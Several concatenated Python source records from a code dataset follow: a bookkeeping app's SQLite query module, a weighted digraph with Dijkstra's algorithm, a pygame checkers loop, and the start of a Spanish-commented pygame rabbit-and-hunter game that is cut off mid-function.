?',\n (\n session['current_org'],\n category_id,\n )\n ).fetchall()\n\n return transactions\n\n\ndef get_all_categories_for_org():\n db = get_db()\n\n categories = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' categories'\n ' JOIN'\n ' category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' org_id_fk = ?',\n (\n session['current_org'],\n )\n ).fetchall()\n\n return categories\n\n\ndef get_category_by_id(cat_id):\n db = get_db()\n\n category = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' categories'\n ' WHERE'\n ' category_id = ?',\n (\n cat_id,\n )\n ).fetchone()\n\n return category\n\n\ndef change_category_status(status_flag, cat_id):\n db = get_db()\n\n db.execute(\n 'UPDATE'\n ' categories'\n ' SET'\n ' category_enabled_flag = ?'\n ' WHERE'\n ' category_id = ?',\n (\n status_flag,\n cat_id,\n )\n )\n\n db.commit()\n\n\ndef change_org_status(org_id):\n db = get_db()\n\n org = get_org_by_id(org_id)\n\n status_flag = org['org_enabled_flag']\n\n if status_flag == 0:\n status_flag = 1\n else:\n status_flag = 0\n\n db.execute(\n 'UPDATE'\n ' organisation'\n ' SET'\n ' org_enabled_flag = ?'\n ' WHERE'\n ' org_id = ?',\n (\n status_flag,\n org_id,\n )\n )\n\n db.commit()\n\n\ndef create_category(form_data):\n db = get_db()\n\n cat_id = str(uuid4())\n\n db.execute(\n 'INSERT INTO categories ('\n ' category_id,'\n ' category_name,'\n ' category_enabled_flag,'\n ' org_id_fk,'\n ' cat_type_id_fk'\n ') VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ' )',\n (\n cat_id,\n form_data['cat_name'],\n form_data['active_flag'],\n session['current_org'],\n form_data['type_id'],\n )\n )\n\n db.commit()\n\n return cat_id\n\n\ndef update_category(form_data, cat_id):\n db = get_db()\n\n db.execute(\n 'UPDATE'\n ' categories'\n ' SET'\n ' category_name = ?,'\n ' category_enabled_flag = ?, '\n ' cat_type_id_fk = ?'\n ' WHERE'\n ' category_id = ?',\n (\n form_data['cat_name'],\n form_data['active_flag'],\n form_data['type_id'],\n cat_id,\n )\n )\n\n db.commit()\n\n\ndef get_category_types():\n db = get_db()\n\n cat_types = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' category_type'\n ).fetchall()\n\n return cat_types\n\n\ndef get_all_orgs_for_current_user():\n db = get_db()\n\n organisations = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' organisation'\n ' JOIN'\n ' user_organisation on org_id = org_id_fk'\n ' LEFT JOIN'\n ' organisation_type on org_type = org_type_id'\n ' WHERE'\n ' user_id_fk = ?',\n (\n session['user_id'],\n )\n ).fetchall()\n\n return organisations\n\n\ndef get_active_orgs_for_current_user():\n db = get_db()\n\n orgs = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' organisation'\n ' JOIN'\n ' user_organisation on org_id = org_id_fk'\n ' WHERE'\n ' user_id_fk = ? and'\n ' org_enabled_flag = 1',\n (\n session['user_id'],\n )\n ).fetchall()\n\n return orgs\n\ndef get_all_orgs():\n db = get_db()\n\n orgs = db.execute(\n 'SELECT * FROM organisation'\n ).fetchall()\n\n return orgs\n\n\ndef create_organisation(form_data):\n db = get_db()\n\n org_id = str(uuid4())\n\n db.execute(\n 'INSERT INTO organisation ('\n ' org_id,'\n ' org_name,'\n ' org_enabled_flag,'\n ' org_vat,'\n ' org_number,'\n ' org_type,'\n ' org_vat_flag'\n ' ) VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ' )',\n (\n org_id,\n form_data['org_name'],\n form_data['org_enabled_flag'],\n form_data['org_vat'],\n form_data['org_no'],\n form_data['org_type'],\n form_data['org_vat_flag'],\n )\n )\n\n add_org_permissions(\n g.user['user_id'],\n org_id,\n )\n\n db.commit()\n\n return org_id\n\n\ndef get_organisation_types():\n db = get_db()\n\n org_types = db.execute(\n 'SELECT *'\n ' FROM organisation_type'\n ).fetchall()\n\n return org_types\n\n\ndef add_org_permissions(user_id, org_id):\n # add user permissions for own organisations\n db = get_db()\n\n db.execute(\n 'INSERT INTO user_organisation ('\n ' user_id_fk,'\n ' org_id_fk'\n ' ) VALUES ('\n ' ?,'\n ' ?'\n ' )',\n (\n user_id,\n org_id,\n )\n )\n\n db.commit()\n\n\ndef update_organistation(form_data, org_id):\n db = get_db()\n\n db.execute(\n 'UPDATE'\n ' organisation'\n ' SET'\n ' org_name = ?,'\n ' org_enabled_flag = ?,'\n ' org_type = ?,'\n ' org_vat = ?,'\n ' org_number = ?'\n ' WHERE'\n ' org_id = ?',\n (\n form_data['org_name'],\n form_data['org_enabled_flag'],\n form_data['org_type'],\n form_data['org_vat'],\n form_data['org_no'],\n org_id,\n )\n )\n\n db.commit()\n\n\ndef get_org_by_id(org_id):\n db = get_db()\n\n org = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' organisation'\n ' WHERE'\n ' org_id = ?',\n (\n org_id,\n )\n ).fetchone()\n\n return org\n\n\ndef get_bank_accounts_for_current_org():\n db = get_db()\n\n accounts = db.execute(\n 'SELECT'\n ' bank_id,'\n ' bank_name,'\n ' bank_reference,'\n ' bank_enabled_flag,'\n ' bank_currency_code,'\n ' IFNULL(bank_balance, 0) as \"bank_balance\",'\n ' bank_count.bank_count,'\n ' row_number()over(order by bank_id) as row_no'\n ' FROM'\n ' bank'\n ' LEFT JOIN'\n ' ('\n ' SELECT'\n ' bank_id_fk,'\n ' round('\n ' sum('\n ' IFNULL(trans_value_net, 0) + '\n ' IFNULL(trans_value_vat, 0) '\n ' ), '\n ' 2 ) as \"bank_balance\"'\n ' FROM'\n ' transactions'\n ' GROUP BY'\n ' bank_id_fk'\n ' ) as trans on trans.bank_id_fk = bank.bank_id'\n ' LEFT JOIN'\n ' ('\n ' SELECT'\n ' org_id_fk,'\n ' count(bank_id) as bank_count'\n ' FROM'\n ' bank'\n ' GROUP BY'\n ' org_id_fk'\n ' ) as bank_count on bank_count.org_id_fk = bank.org_id_fk'\n ' WHERE'\n ' bank.org_id_fk = ?'\n ' GROUP BY'\n ' bank_id',\n (\n session['current_org'],\n )\n ).fetchall()\n\n return accounts\n\n\ndef create_bank_account(form_data, org_id):\n db = get_db()\n\n bank_id = str(uuid4())\n\n if org_id == '':\n org_id = session['current_org']\n\n db.execute(\n 'INSERT INTO bank ('\n ' bank_id,'\n ' bank_name,'\n ' bank_reference,'\n ' bank_created_date,'\n ' bank_enabled_flag,'\n ' bank_currency_code,'\n ' org_id_fk'\n ' ) VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ' )',\n (\n bank_id,\n form_data['bank_name'],\n form_data['bank_reference'],\n datetime.datetime.now().strftime('%Y-%m-%d'),\n form_data['bank_enabled_flag'],\n form_data['bank_currency_code'],\n org_id,\n )\n )\n\n vat_type = db.execute(\n 'SELECT vat_type_id'\n ' FROM'\n ' vat_type'\n ' WHERE'\n ' vat_type_name = \"Out of Scope\"'\n ).fetchone()\n\n db.commit()\n\n o_bal = {\n 'trans_date': form_data['open_date'],\n 'trans_desc': 'Opening Balance',\n 'trans_value_net': form_data['open_balance'],\n 'trans_value_vat': 0.00,\n 'sign': 1,\n 'org_id_fk': org_id,\n 'trans_created_date': datetime.datetime.now().strftime('%Y-%m-%d'),\n 'bank_id': bank_id,\n 'cat_id': '',\n 'vat_type_id_fk': vat_type['vat_type_id']\n }\n\n create_transaction(o_bal)\n\n return bank_id\n\n\ndef create_transaction(trans_data):\n db = get_db()\n\n if 'trans_value_vat' not in trans_data:\n vat_value = 0\n vat_type_id_fk = ''\n else:\n vat_value = trans_data['trans_value_vat']\n vat_type_id_fk = trans_data['vat_type_id_fk']\n\n db.execute(\n 'INSERT INTO transactions ('\n ' trans_id,'\n ' trans_post_date,'\n ' trans_created_date,'\n ' trans_value_net,'\n ' trans_value_vat,'\n ' trans_description,'\n ' user_id_fk,'\n ' org_id_fk,'\n ' bank_id_fk,'\n ' category_id_fk,'\n ' vat_type_id_fk'\n ' ) VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ')',\n (\n str(uuid4()),\n trans_data['trans_date'],\n datetime.datetime.now().strftime('%Y-%m-%d'),\n float(trans_data['trans_value_net']) * float(trans_data['sign']),\n float(vat_value) * float(trans_data['sign']),\n trans_data['trans_desc'],\n session['user_id'],\n session['current_org'],\n trans_data['bank_id'],\n trans_data['cat_id'],\n vat_type_id_fk,\n )\n )\n\n db.commit()\n\ndef get_bank_account(bank_id):\n db = get_db()\n\n account = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' bank'\n ' WHERE'\n ' bank_id = ? and'\n ' org_id_fk = ?',\n (\n bank_id,\n session['org_id'],\n )\n ).fetchone()\n\n return account\n\ndef update_bank_details(bank_data, bank_id):\n db = get_db()\n\n db.execute(\n 'UPDATE'\n ' bank'\n ' SET'\n ' bank_name = ?,'\n ' bank_reference = ?,'\n ' bank_created_date = ?,'\n ' bank_enabled_flag = ?,'\n ' bank_currency_code = ?'\n ' WHERE'\n ' bank_id = ?',\n (\n bank_data['bank_name'],\n bank_data['bank_reference'],\n datetime.datetime.now().strftime('%Y-%m-%d'),\n bank_data['bank_enabled_flag'],\n bank_data['bank_currency_code'],\n bank_id,\n )\n )\n\n db.commit()\n\ndef get_active_categories_for_current_org():\n db = get_db()\n\n categories = db.execute(\n \"SELECT\"\n \" *\"\n \" FROM\"\n \" categories\"\n \" WHERE\"\n \" org_id_fk = ? and\"\n \" category_enabled_flag = 1\",\n (\n session['current_org'],\n )\n ).fetchall()\n\n return categories\n\n\ndef income_chart():\n db = get_db()\n\n from_date = datetime.datetime.now() - datetime.timedelta(days=365)\n from_date = datetime.datetime.strftime(from_date, '%Y-%m-%d')\n\n values = db.execute(\n 'SELECT'\n ' strftime(\"%Y-%m-\", trans_post_date)||\"01\" as period,'\n ' sum(trans_value_net) as value'\n ' FROM'\n ' transactions'\n ' JOIN'\n ' categories on category_id = category_id_fk'\n ' JOIN'\n ' category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' transactions.org_id_fk=? and'\n ' cat_type_name = \"Income\" and'\n ' trans_post_date >= ?'\n ' GROUP BY'\n ' cat_type_name,'\n ' period'\n ' ORDER BY'\n ' period',\n (\n session['current_org'],\n from_date,\n )\n ).fetchall()\n\n return values\n\n\ndef expense_chart():\n db = get_db()\n\n from_date = datetime.datetime.now() - datetime.timedelta(days=365)\n from_date = datetime.datetime.strftime(from_date, '%Y-%m-%d')\n\n values = db.execute(\n 'SELECT'\n ' strftime(\"%Y-%m-\", trans_post_date)||\"01\" as period,'\n ' sum(trans_value_net) as value'\n ' FROM'\n ' transactions'\n ' JOIN'\n ' categories on category_id = category_id_fk'\n ' JOIN'\n ' category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' transactions.org_id_fk=? and'\n ' cat_type_name = \"Expense\" and'\n ' trans_post_date >= ?'\n ' GROUP BY'\n ' cat_type_name,'\n ' period'\n ' ORDER BY'\n ' period',\n (\n session['current_org'],\n from_date,\n )\n ).fetchall()\n\n return values\n\n\ndef get_vat_codes():\n db = get_db()\n\n vat_codes = db.execute(\n 'SELECT *'\n ' FROM vat_type'\n ).fetchall()\n\n return vat_codes\n\n\ndef create_standard_coa(coa):\n db = get_db()\n\n fixed_asset = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Fixed Assets\"'\n ).fetchone()\n\n current_asset = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Current Liabilities\"'\n ).fetchone()\n\n current_liability = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Current Liabilities\"'\n ).fetchone()\n\n long_term_liability = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Long-term Liabilities\"'\n ).fetchone()\n\n income = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Income\"'\n ).fetchone()\n\n expense = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Expense\"'\n ).fetchone()\n\n equity = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Equity\"'\n ).fetchone()\n\n if coa == 'individual':\n fixed_asset_categories = [\n 'House',\n 'Motor vehicles',\n 'Pension'\n ]\n\n for each in fixed_asset_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': fixed_asset['cat_type_id']\n }\n\n create_category(category)\n\n liability_categories = [\n 'Mortgage'\n ]\n\n for each in liability_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': long_term_liability['cat_type_id']\n }\n\n create_category(category)\n\n income_categories = [\n 'Salary',\n 'Interest'\n ]\n\n for each in income_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': income['cat_type_id']\n }\n\n create_category(category)\n\n expense_categories = [\n 'Rent',\n 'Utilities',\n 'Phone',\n 'Internet',\n 'Insurance',\n 'Food',\n 'Holiday',\n 'Socializing',\n 'Other Expenses'\n ]\n\n for each in expense_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': expense['cat_type_id']\n }\n\n create_category(category)\n\n if coa == 'limited':\n fixed_asset_categories = [\n 'Plant and Machinery',\n 'Motor Vehicles',\n 'Fixtures and Fittings'\n ]\n\n for each in fixed_asset_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': fixed_asset['cat_type_id']\n }\n\n create_category(category)\n\n asset_categories = [\n 'Debtors',\n 'Stock',\n 'Prepayments'\n ]\n\n for each in asset_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': current_asset['cat_type_id']\n }\n\n create_category(category)\n\n current_liability_categories = [\n 'Creditors',\n 'Deferred Income',\n 'Taxes',\n 'Accruals'\n ]\n\n for each in current_liability_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': current_liability['cat_type_id']\n }\n\n create_category(category)\n\n long_liability_categories = [\n 'Bank Loans',\n 'Directors Loan Account',\n 'Corporation Tax'\n ]\n\n for each in long_liability_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': long_term_liability['cat_type_id']\n }\n\n create_category(category)\n\n income_categories = [\n 'Sales',\n 'Other Income'\n ]\n\n for each in income_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': income['cat_type_id']\n }\n\n create_category(category)\n\n expense_categories = [\n 'Cost of Goods Sold',\n 'Rent and Rates',\n 'Utilities',\n 'Wages and Salaries',\n 'Travel Expenses',\n 'IT and Telecomms',\n 'Stationary and Postage',\n 'Professional and Legal Fees',\n 'Other Expenses',\n 'Depreciation',\n 'Tax'\n ]\n\n for each in expense_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': expense['cat_type_id']\n }\n\n create_category(category)\n\n\n db.commit()\n\n\ndef add_demo_data():\n db = get_db()\n\n org_type = db.execute(\n 'SELECT * FROM organisation_type'\n ' WHERE org_type_name = \"Limited Company\"'\n ).fetchone()\n\n demo_org = {\n \"org_name\": 'Hermes Demo Ltd',\n \"org_enabled_flag\": 1,\n \"org_vat\": \"12 3456 789 GB\",\n \"org_no\": \"12345678\",\n \"org_type\": org_type['org_type_id']\n }\n\n org_id = create_organisation(demo_org)\n\n bank_accounts = [\n {\n 'bank_name': 'Business Bank Account',\n 'bank_reference': 00-00-00-10000001,\n 'bank_enabled_flag': 1,\n 'bank_currency_code': 'gbp',\n 'open_date': datetime.date(2019, 1, 1),\n 'open_balance': round(random.random() * 10000, 2)\n },\n\n {\n 'bank_name': 'Overdrawn Account',\n 'bank_reference': 00 - 00 - 00 - 10000002,\n 'bank_enabled_flag': 1,\n 'bank_currency_code': 'gbp',\n 'open_date': datetime.date(2019, 1, 1),\n 'open_balance': round(random.random() * 1000, 2) * -1\n },\n\n {\n 'bank_name': 'Savings Account',\n 'bank_reference': 00 - 00 - 00 - 10000002,\n 'bank_enabled_flag': 1,\n 'bank_currency_code': 'gbp',\n 'open_date': datetime.date(2019, 1, 1),\n 'open_balance': round(random.random() * 100000, 2)\n }\n\n ]\n\n for bank in bank_accounts:\n bank_id = create_bank_account(bank, org_id)\n\n db.commit()\n\n\ndef get_current_settings():\n db = get_db()\n\n settings = db.execute(\n 'SELECT * FROM settings WHERE user_id_fk = ?',\n (\n session['user_id'],\n )\n ).fetchone()\n\n return settings\n\n\ndef get_current_global_settings():\n db = get_db()\n\n settings = db.execute(\n 'SELECT * FROM global_settings'\n ).fetchone()\n\n return settings\n\n\ndef update_settings(form_data):\n db = get_db()\n\n db.execute(\n 'UPDATE settings'\n ' SET settings_theme = ?'\n ' WHERE user_id_fk = ?',\n (\n form_data['settings_theme'],\n session['user_id'],\n )\n )\n\n db.commit()\n\ndef update_global_settings(form_data):\n db = get_db()\n\n if 'mtd_prod_switch' not in form_data:\n switch_value = 'off'\n else:\n switch_value = form_data['mtd_prod_switch']\n\n db.execute(\n 'UPDATE global_settings'\n ' SET'\n ' mj_api_key = ?,'\n ' mj_api_secret = ?,'\n ' mj_api_from_email = ?,'\n ' companies_house_api_key = ?,'\n ' mtd_client_id = ?,'\n ' mtd_client_secrets = ?,'\n ' mtd_server_token = ?,'\n ' mtd_prod_status = ?'\n ' WHERE'\n ' global_id = 1',\n (\n form_data['mj_api_key'],\n form_data['mj_api_secret'],\n form_data['mj_api_from_email'],\n form_data['companies_house_api_key'],\n form_data['mtd_client_id'],\n form_data['mtd_client_secrets'],\n form_data['mtd_server_token'],\n switch_value,\n )\n )\n\n db.commit()\n\n\ndef get_vat_transactions():\n db = get_db()\n\n vat_trans = db.exectute(\n 'SELECT'\n ' sum(trans_value_net),'\n ' sum(trans_value_vat),'\n ' cat_type_name,'\n ' vat_type_id_fk,'\n ' vat_rtn_id_fk'\n ' FROM'\n ' transactions'\n ' JOIN categories on category_id = category_id_fk'\n ' JOIN category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' transactions.trans_post_date >= ? and'\n ' transactions.trans_post_data <= ?'\n ' group by'\n ' cat_type_name,'\n ' vat_type_id_fk'\n ).fetchall()\n\ndef get_all_contacts():\n db = get_db()\n\n contacts = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' contacts'\n ' WHERE'\n ' org_id_fk = ?',\n (\n session['current_org'],\n )\n ).fetchall()\n\n return contacts\n\ndef create_contact(contact):\n db = get_db()\n\n db.execute(\n 'INSERT INTO contacts ('\n ' contact_id,'\n ' contact_name,'\n ' contact_account_no,'\n ' contact_foreign_account_no,'\n ' contact_vat_registration,'\n ' contact_company_no,'\n ' contact_type,'\n ' contact_email,'\n ' contact_phone,'\n ' contact_main_contact,'\n ' contact_web_address,'\n ' org_id_fk'\n ' ) VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ' )',\n (\n str(uuid4()),\n contact['contact_name'],\n contact['contact_account_no'],\n contact['contact_foreign_account_no'],\n contact['contact_vat_registration'],\n contact['contact_company_no'],\n contact['contact_type'],\n contact['contact_email'],\n contact['contact_phone'],\n contact['contact_main_contact'],\n contact['contact_web_address'],\n session['current_org'],\n )\n )\n\n db.commit()","sub_path":"hermes/core_queries.py","file_name":"core_queries.py","file_ext":"py","file_size_in_byte":25121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"211294622","text":"#I should burry this and comeback.\n\nclass weighted_digraph:\n\n class __edge(object):\n\n def __init__(self, to_node, weight):\n\n self.to_node = to_node\n\n self.weight = weight\n\n class __node(object):\n\n def __init__(self, value):\n\n self.value = value\n\n self.edges = []\n\n self.distance = 0\n\n self.because = None\n\n def __str__(self):\n\n result = str(self.value)\n\n for edge in self.edges:\n\n result += \"->\" + str(edge.to_node.value) + \\\n \"(\" + str(edge.weight) + \")\"\n\n return (result)\n\n def add_edge(self, new_edge):\n\n if not self.is_adjacent(new_edge.to_node):\n\n self.edges.append(new_edge)\n\n def remove_edge(self, to_node):\n\n for edge in self.edges:\n\n if edge.to_node == to_node:\n\n self.edges.remove(edge)\n\n def is_adjacent(self, node):\n\n for edge in self.edges:\n\n if edge.to_node == node:\n\n return (True)\n\n return (False)\n\n def __init__(self, directed=True):\n\n self.__nodes = []\n\n self.__directed = directed\n\n def __len__(self):\n\n return (len(self.__nodes))\n\n def __str__(self):\n\n result = \"\"\n\n for node in self.__nodes:\n\n result += str(node) + '\\n'\n\n return (result)\n\n def get_nodes(self):\n\n return self.__nodes[:]\n\n def find(self, value):\n\n for node in self.__nodes:\n\n if node.value == value:\n\n return (node)\n\n return (None)\n\n def add_nodes(self, nodes):\n\n for node in nodes:\n\n self.add_node(node)\n\n def add_node(self, value):\n\n if not self.find(value):\n\n self.__nodes.append(self.__node(value))\n\n def add_edges(self, edges):\n\n for edge in edges:\n\n self.add_edge(edge[0], edge[1], edge[2])\n\n \"\"\" Add an edge between two values. If the nodes\n for those values aren't already in the graph,\n add those. \"\"\"\n\n def add_edge(self, from_value, to_value, weight):\n\n from_node = self.find(from_value)\n\n to_node = self.find(to_value)\n\n if not from_node:\n\n self.add_node(from_value)\n\n from_node = self.find(from_value)\n\n if not to_node:\n\n self.add_node(to_value)\n\n to_node = self.find(to_value)\n\n from_node.add_edge(self.__edge(to_node, weight))\n\n if not self.__directed:\n\n to_node.add_edge(self.__edge(from_node, weight))\n\n def remove_edge(self, from_value, to_value, weight):\n\n from_node = self.find(from_value)\n\n to_node = self.find(to_value)\n\n from_node.remove_edge(to_node)\n\n if not self.directed:\n\n to_node.remove_edge(from_node)\n\n def are_adjacent(self, value1, value2):\n\n return (self.find(value1).is_adjacent(self.find(value2)))\n\n def why(self, value, start):\n\n snake_tail = []\n\n tail = self.find(value)\n\n snake_tail.append(tail.distance)\n\n while tail.value != start:\n\n snake_tail.append(tail.value)\n\n tail = tail.because\n\n snake_tail.append(start)\n\n return snake_tail\n\n def dijkstra(self, start):\n\n to_compare = []\n\n for_unit_test = []\n\n will_compare = None\n\n for node in self.__nodes:\n\n node.distance = float('inf')\n\n node.because = None\n\n source = self.find(start)\n\n source.distance = 0\n\n to_compare.append(source)\n\n while to_compare:\n\n compared_with = float('inf')\n\n for node in to_compare:\n\n if node.distance < compared_with:\n\n will_compare = node\n\n compared_with = node.distance\n\n to_compare.remove(will_compare)\n\n for_unit_test.append([will_compare.distance, will_compare.value])\n\n for edge in will_compare.edges:\n\n distance_to_compare = edge.weight + will_compare.distance\n\n if distance_to_compare < edge.to_node.distance:\n\n edge.to_node.distance = distance_to_compare\n\n edge.to_node.because = will_compare\n\n to_compare.append(edge.to_node)\n\n if not track_prev:\n\n final_list = []\n\n for node in for_unit_test:\n\n if node not in final_list:\n\n final_list.append(node)\n\n else:\n\n final_list = []\n\n for node in for_unit_test:\n\n if node not in final_list:\n\n final_list.append(node)\n\n final_list_how = []\n\n for node in final_list:\n\n final_list_how.append(self.why(node[1], start))\n\n return final_list_how\n\ngraph = weighted_digraph()\n\nprint(graph)\n","sub_path":"Assig5/EX_W_Map.py","file_name":"EX_W_Map.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"607670990","text":"# Drawing the board for Checkers\r\nimport pygame\r\n\r\nfrom checkers_stuff.constants import WIDTH, HEIGHT, SQUARE_SIZE\r\nfrom checkers_stuff.game import Game\r\n\r\n# from checkers_stuff.board import Board\r\n\r\nFPS = 60\r\n\r\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\r\npygame.display.set_caption(\"Checkers\")\r\n\r\n\r\n# this will tell us based on the position of our mouse what square\r\n# row and col it is on\r\n\r\n\r\ndef get_row_col_from_mouse(pos):\r\n # we will get the x, y of our mouse and it will tell us what row and col we're in\r\n x, y = pos\r\n # if square size is 100 and we're trying to figure out what row we're in\r\n # if our y is at 650 then we know we must be in row six because 100\r\n # goes into 650 six times\r\n row = y // SQUARE_SIZE\r\n col = x // SQUARE_SIZE\r\n return row, col\r\n\r\n\r\ndef main():\r\n # while run is true we will run this loop\r\n run = True\r\n clock = pygame.time.Clock()\r\n game = Game(WIN)\r\n # it's Game() because that is what the class is named\r\n\r\n # enable to check the board being drawn\r\n # board = Board()\r\n\r\n # checking if piece is deleted, and then redrawn at the specified square\r\n # comment out this piece to see that the function mouse button down works\r\n # piece = board.get_piece(0, 1)\r\n\r\n while run:\r\n clock.tick(FPS)\r\n\r\n if game.winner() != None:\r\n # checking if there's a winner and printing out something when there is a winner\r\n print(game.winner())\r\n\r\n for event in pygame.event.get():\r\n # if the red 'X' is pushed, quit the game\r\n if event.type == pygame.QUIT:\r\n run = False\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n pos = pygame.mouse.get_pos()\r\n row, col = get_row_col_from_mouse(pos)\r\n # commented out so game_logic will do this\r\n # piece = board.get_piece(row, col)\r\n # to show the piece gets moved, comment out for actually functionality\r\n # board.move(piece, 4, 3)\r\n # if game.turn == RED:\r\n game.select(row, col)\r\n\r\n game.update()\r\n\r\n # commented out enabled to test game mechanics\r\n # board.draw(WIN)\r\n # pygame.display.update()\r\n\r\n pygame.quit()\r\n\r\n\r\nmain()\r\n","sub_path":"checkers.py","file_name":"checkers.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"282034237","text":"# Encoding: UTF-8\n# Autor: Oscar Alejandro Torres Maya, A01377686\n# Descripción: Proyecto Final, videojuego\n\nimport pygame #Importa librería de pygame\nfrom random import randint #Importa la función randint de la librería random\n\n#Dimensiones de la pantalla\nANCHO = 800\nALTO = 600\n\n#Colores\nAZUL = (96,111,140)\nROJO = (255, 0, 0)\nNEGRO = (0,0,0)\nVERDE = (76,145,65)\n\n#Estados de juego\nMENU = 1\nJUGANDO = 2\nFINAL = 3\nPUNTAJES = 4\n\n\n#Dibuja al personaje en la pantalla\ndef dibujarPersonaje(ventana, spritePersonaje):\n ventana.blit(spritePersonaje.image, spritePersonaje.rect)\n\n\n#Dibuja a los enemigos en la pantalla\ndef dibujarEnemigos(ventana, listaEnemigos, listaEnemigos2):\n for enemigo in listaEnemigos: # VISITAR O ACCEDER A CADA ELEMENTO\n ventana.blit(enemigo.image, enemigo.rect) # IMAGEN , LUGAR\n\n for enemigo2 in listaEnemigos2: # VISITAR O ACCEDER A CADA ELEMENTO\n ventana.blit(enemigo2.image, enemigo2.rect) # IMAGEN , LUGAR\n\n\n#Dibuja a los árboles en la pantalla\ndef dibujarObstaculo(ventana,spriteObstaculo):\n ventana.blit(spriteObstaculo.image, spriteObstaculo.rect) # IMAGEN , LUGAR\n\n\n#Dibuja el bonus en la pantalla\ndef dibujarBonus(ventana,spriteBonus):\n ventana.blit(spriteBonus.image, spriteBonus.rect) # IMAGEN , LUGAR\n\n\n#Mueve a los enemigos\ndef moverEnemigos(listaEnemigos,listaEnemigos2):\n for enemigo in listaEnemigos: #Mueve a todos los enemigos\n enemigo.rect.left -= 5 #Velocidad del cazador verde por pixel\n\n for enemigo2 in listaEnemigos2: #Mueve a todos los enemigos\n enemigo2.rect.left += 5 #Velocidad del cazador naranja por pixel\n\n\n#Dibuja las opciones del menú\ndef dibujarMenu(ventana, imgBotonJugar, imgBotonSalir, imgHighscore):\n ventana.blit(imgBotonJugar, (ANCHO//2-110, ALTO//3-50))\n ventana.blit(imgBotonSalir, (ANCHO//2-110, ALTO//3+100))\n ventana.blit(imgHighscore, (ANCHO//2-110, ALTO - 160))\n\n\n#Verifica si el conejo y cazador chocaron\ndef verificarColision(listaEnemigos, listaEnemigos2, spritePersonaje):\n for cazador in range(len(listaEnemigos)-1, -1, -1):\n enemigo = listaEnemigos[cazador]\n # Conejo vs cazador derecha\n xPersonaje, yPersonaje, anchoPersonaje, altPersonaje = spritePersonaje.rect\n xEnemigo, yEnemigo, anchoEnemigo, altEnemigo = enemigo.rect\n\n #PUNTO INFERIOR Y SUPERIOR IZQUIERDO\n if xPersonaje >= xEnemigo and xPersonaje <= xEnemigo+anchoEnemigo and yPersonaje+altPersonaje >= yEnemigo and yPersonaje <= yEnemigo+altEnemigo:\n listaEnemigos.remove(enemigo) #Colisionaron\n return True\n\n #PUNTO INFERIOR Y SUPERIOR DERECHO\n elif xPersonaje+anchoPersonaje >= xEnemigo and xPersonaje <= xEnemigo+anchoEnemigo and yPersonaje+altPersonaje >= yEnemigo and yPersonaje <= yEnemigo+altEnemigo:\n listaEnemigos.remove(enemigo) #Colisionaron\n return True\n\n for cazador2 in range(len(listaEnemigos2)-1, -1, -1):\n enemigo2 = listaEnemigos2[cazador2]\n # Conejo vs cazador izquierda\n xPersonaje, yPersonaje, anchoPersonaje, altPersonaje = spritePersonaje.rect\n xEnemigo2, yEnemigo2, anchoEnemigo2, altEnemigo2 = enemigo2.rect\n\n # PUNTO INFERIOR Y SUPERIOR IZQUIERDO\n if xPersonaje >= xEnemigo2 and xPersonaje <= xEnemigo2 + anchoEnemigo2 and yPersonaje + altPersonaje >= yEnemigo2 and yPersonaje <= yEnemigo2 + altEnemigo2:\n listaEnemigos2.remove(enemigo2) #Colisionaron\n return True\n\n # PUNTO INFERIOR Y SUPERIOR 